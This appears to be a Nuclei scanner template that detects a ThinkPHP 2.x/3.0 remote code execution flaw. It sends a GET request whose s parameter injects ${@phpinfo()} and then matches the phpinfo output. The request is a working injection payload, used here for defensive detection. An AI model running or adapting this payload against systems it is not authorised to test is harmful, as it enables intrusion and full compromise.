id: thinkphp-2-rce

info:
  name: ThinkPHP 2/3 - Remote Code Execution
  author: dr_set
  severity: critical
  description: ThinkPHP 2.x and 3.0 in Lite mode are susceptible to remote code execution via the s parameter. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce
  metadata:
    max-request: 1
  tags: thinkphp,rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
          - "ThinkPHP"
        condition: and

      - type: status
        status:
          - 200

# digest: 490a0046304402203aa0264e3d65d89275494ab1459acfe3a1389d4dc7a090667737d23b4502a13002203006e9e07770f17e1fab6cbb7b39ed6caa5d5195a93922fa96fe11f3a6572a81:922c64590222798bb761d5b6d8e72950
